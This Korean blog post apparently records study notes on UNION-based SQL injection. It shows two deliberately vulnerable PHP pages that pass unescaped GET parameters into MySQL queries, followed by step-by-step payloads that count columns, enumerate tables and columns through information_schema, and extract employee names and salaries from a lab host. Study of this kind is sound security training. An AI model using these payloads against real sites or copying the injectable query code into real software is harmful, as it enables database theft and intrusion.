Self-Improvement
UNION SQLi(Error Based, 숫자형, 문자형, concat_ws()) 본문
소스코드 1
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
<?php
if(!$link = mysql_connect('localhost', 'root', 'root')) {
echo 'Could not connect to mysql';
exit;
}
if (!mysql_select_db('northwind', $link)){
echo 'Could not select database';
exit;
}
$_empid = $_GET['empid'];
$sql = 'SELECT * FROM Employees WHERE employeeid=' . $_empid;
$result = mysql_query($sql, $link);
if(!$result){
echo "db error, could not query the database\n";
echo 'MySQL error: '.mysql_Error();
exit;
}
print "<table border=1 cellpadding=5 cellspacing=0>\n";
print "\t<tr>\n\t\t<td>Employee ID</td><td>First Name</td><td>Title</td><td>Hire Date</td>\n\t</tr>";
while($row = mysql_fetch_assoc($result)){
print "\t<tr>\n\t\t<td>".$row['EmployeeID']."</td><td>".$row['FirstName']."</td><td>".$row['Title']."</td><td>".$row['HireDate']."</td>\n\t</tr>\n";
}
print "</table>\n";
mysql_free_result($result);
?>
|
cs |
- http://192.168.1.46/empinfo_id.php?empid=1
- http://192.168.1.46/empinfo_id.php?empid=1'
| 1 order by 19 |
- http://192.168.1.46/empinfo_id.php?empid=1%20order%20by%2019
| 1 order by 20 |
- http://192.168.1.46/empinfo_id.php?empid=1%20order%20by%2020
| 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from dual |
| 0 UNION SELECT 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_type='base table' |
| 0 UNION SELECT 1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name='Employees' |
| 0 UNION SELECT EmployeeID,2,FirstName,Salary,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from Employees; |
소스코드 2
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
<?php
if(!$link = mysql_connect('localhost', 'root', 'root')) {
echo 'Could not connect to mysql';
exit;
}
if (!mysql_select_db('northwind', $link)){
echo 'Could not select database';
exit;
}
$_empname= $_GET['empname'];
$sql = 'SELECT * FROM Employees WHERE FirstName like \'%'.$_empname.'%\' limit 10';
$result = mysql_query($sql, $link);
if(!$result){
echo "db error, could not query the database\n";
echo 'MySQL error: '.mysql_Error();
exit;
}
print "<table border=1 cellpadding=5 cellspacing=0>\n";
print "\t<tr>\n\t\t<td>Employee ID</td><td>First Name</td><td>Title</td><td>Hire Date</td>\n\t</tr>";
while($row = mysql_fetch_assoc($result)){
print "\t<tr>\n\t\t<td>".$row['EmployeeID']."</td><td>".$row['FirstName']."</td><td>".$row['Title']."</td><td>".$row['HireDate']."</td>\n\t</tr>\n";
}
print "</table>\n";
mysql_free_result($result);
?>
|
cs |
- http://192.168.1.46/empinfo_name.php?empname=nan
| 0 UNION SELECT EmployeeID,2,FirstName,Salary,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from Employees;1' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from dual# |
| 1' union select 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_type='base table'# |
| 1' union select 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name='Employees'# |
| 1' union select 1,2,concat_ws(',',employeeid,firstname,hiredate),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from Employees# |
'SQLi' 카테고리의 다른 글
'SQLi' Related Articles
more
